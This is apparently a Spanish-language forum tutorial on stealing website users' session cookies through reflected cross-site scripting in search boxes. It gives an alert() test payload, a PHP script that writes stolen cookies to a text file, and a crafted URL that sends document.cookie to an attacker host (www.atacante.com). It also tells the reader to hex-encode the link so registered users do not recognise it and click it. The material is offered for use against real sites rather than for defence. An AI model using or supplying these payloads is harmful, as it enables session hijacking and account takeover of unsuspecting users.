Cdigo:

<script>alert()</script>
[~]Si salta una alarma al pulsar el boton, significa que ese buscador es vulnera
ble.
[~]Si no salta pues no jodemos y a buscar otro...
Suponiendo que sea vulnerable, el siguiente paso es ver el nombre de la caja de
texto y del botn.
Para esto, tenemos que ver el codigo fuente de dicha pgina y buscar algo como:
<input type="text" name="palabra"> que ser el textbox(caja de texto xD).
<input type="submit" name="buscar" value="Buscar"> que ser el boton.
Ahora ya sabemos que el textbox se llama palabra y que el botn se llama buscar.
[~]Para almacenar las cookies, tenermos dos opciones -> almazenarlas en una base
de datos(mysql) o almacenarlas en un archivo de texto(la mas facil).
A continuacion vamos a crear una pagina en php, este archivo crear otro (archivo.
txt) cuando algun usuario caiga en el ataque y escribira a continuacion los sigu
ientes usuarios.
cookies.php
Cdigo:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
archivo.txt
Este archivo se creara automaticamente y ser en el que se almacenen las cookies,
osease, que para ver los resultados teneis que entrar en este archivo.
Una vez hecho este paso solo tenemos que crear "LA URL MALIGNA"(como yo lo llamo
) que ser de la siguiente forma:
Cdigo:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://w
ww.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
Voy a explicar cada parte de esta "URL MALIGNA".
[~]
http://www.vulnerable.com/buscador.php
Esta parte lo unico que hace es entrar en la pagina del buscador.
[~]?palabra=
Esta parte es para darle un valor a la variable palabra, es decir, si el textbox
se llamara manolo esto quedara de la siguiente forma: ?manolo=
Lo mas importante:
[~]<script>window.location='http://www.atacante.com/cookies.php?cookie='+documen
t.cookie;</script>
Esto es el valor que le damos a la variable palabra (que es el textbox). Este va
lor lo que hace esque redirecciona a la pagina http://www.atacante.com/cookie.ph
p y le da el valor de la cookie(del usuario de la web) a la variables cookie de
la pagina que creamos antes(cookies.php)
Suena un poco lioso pero es muy simple.
[~]&buscar=;
Esto lo que hace es simular que el boton (con el nombre -> buscar) este pulsado,
sin esto no realizaria la accin.
Tambien decir que si el botn del buscador se llamara jose, eso tendriamos que ree
mplazarlo por &jose=;
Ahora viene la parte mas importante, que es hacer que un usuario de esa web(que
est registrado) entre en ese enlace("LA URL MALIGNA").
Esto seguramente sea la parte mas complicada, porque cualkier persona con unos c
onocimientos muy basicos de programacion web sabra lo que hace esa "URL MALIGNA".
Con lo cual vamos a proceder a "camuflar" un poco esa URL.
Para esto vamos a sustituir cada caracter por su correspondiente valor en hexage
simal poniendo el signo % delante de cada uno.
Aqu os dejo una buena tabla HEX:
http://www.ascii.cl/es/
Con lo cual ira quedando algo as:
Cdigo:
%70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E...
esto equivaldra a:
Cdigo:
palabra=<script>...
y tendrias que continuar cambiando los caracteres a hexagesimal.